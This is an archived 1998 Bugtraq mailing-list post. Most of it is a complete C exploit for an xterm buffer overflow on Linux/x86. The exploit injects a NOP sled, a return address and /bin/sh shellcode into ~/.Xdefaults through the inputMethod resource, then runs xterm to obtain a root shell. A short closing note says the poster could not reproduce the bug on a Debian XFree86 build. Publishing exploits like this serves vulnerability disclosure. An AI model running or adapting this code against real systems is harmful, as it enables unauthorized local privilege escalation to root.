xterm exploit [TOG issue]
X-RDate: Sun, 10 May 1998 16:46:37 +0600 (YEKST)
X-UIDL: 35317d3400000201
Date: Fri, 8 May 1998 16:50:05 +0200
From: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT>
To: BUGTRAQ@NETSPACE.ORG
Subject: xterm exploit [TOG issue]
/*
xterm_exp.c : linux/x86 xterm.Xaw exploit
by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]
It works against both Xaw and neXtaw widgets
NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
use xterm again.
*/
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
unsigned int getsp() {
asm("mov %esp,%eax");
}
inline rootshell(){
__asm__(
"movb $0x56, %al\n\t"
"l1:cmpb $0x12, %al\n\t"
"je l2\n\t"
"movb $0x12,%al\n\t"
"call l1\n\t"
"l2:pop %esi\n\t"
"xorl %eax,%eax\n\t"
"movb $0x25, %al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,%ebx\n\t"
"movl %esi,%edi\n\t"
"movb $8,%al\n\t"
"addl %eax,%edi\n\t"
"movb $5,%al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,(%edi)\n\t"
"movl %edi,%ecx\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"xorb %al,%al\n\t"
"movl %eax,(%edi)\n\t"
"movl %edi,%edx\n\t"
"movb $0xb,%al\n\t"
"int $0x80\n\t"
".string \"/bin/sh\"\n"
);
}
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
main (int argc, char **argv) {
char *home;
FILE *f_in, *f_out;
char buf[16384];
char shellbuf[16384];
char *s;
int i;
unsigned int sp=getsp();
if (home = getenv("HOME")) chdir(home);
if (!(f_out = fopen(NEWFILE, "w"))) {
perror("fopen");
exit(1);
}
if (f_in = fopen(CONFFILE, "r")) {
fseek(f_in,0,SEEK_SET);
while (!feof(f_in)) {
fgets(buf,16384,f_in);
for (s=buf;isblank(*s);s++);
if (strncmp(s,"xterm*inputMethod",17)<0)
fputs(buf,f_out);
}
fclose(f_in);
}
/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] = 0;
/* write the return adress */
s = shellbuf+2052;
*(int *)s=sp+0x69F5;
/* write the root shell code */
s = shellbuf+2800;
strcpy(s,(char*)rootshell);
fputs("xterm*inputMethod:",f_out);
fputs(shellbuf, f_out);
fclose(f_out);
system("/bin/cp "CONFFILE" "OLDFILE);
system("/bin/mv -f "NEWFILE" "CONFFILE);
execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
I can' t reproduce the problem with the latest Debian compiled XFree86:
andrea@dragon:~$ dpkg -l xbase
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name Version Description
+++-===============-==============-============================================
ii xbase 3.3.2-4 local clients and configuration required by
Andrea[s] Arcangeli
